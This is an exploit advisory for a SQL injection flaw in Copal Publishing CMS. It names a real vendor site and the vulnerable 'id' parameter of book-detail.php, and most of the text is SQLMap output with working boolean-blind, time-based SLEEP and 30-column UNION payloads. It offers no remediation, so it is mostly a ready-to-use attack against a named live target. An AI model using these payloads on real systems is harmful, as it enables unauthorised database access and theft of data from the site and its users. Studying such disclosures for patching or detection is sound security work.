=========================================================
# Exploit Title: Copal Publishing CMS - SQL Injection
# Date: 2021-11-20
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.copalpublishing.com
# Tested on: Parrot OS
# Vulnerability : SQL Injection Vulnerability
=========================================================
[+] POC :- https://www.copalpublishing.com/book-detail.php?id=34'
=========================================================
SQLMap
++++++++++++++++++++++++++
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=34' AND 5261=5261 AND 'CqvE'='CqvE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=34' AND (SELECT 7610 FROM (SELECT(SLEEP(5)))baSz) AND 'twIZ'='twIZ
Type: UNION query
Title: Generic UNION query (NULL) - 30 columns
Payload: id=-9222' UNION ALL SELECT NULL,CONCAT(0x716a707071,0x4a6d77496358775a7259576f724f5948504c634b696d7263464e44674a4a61524d616a5541577946,0x716b766a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
=========================================================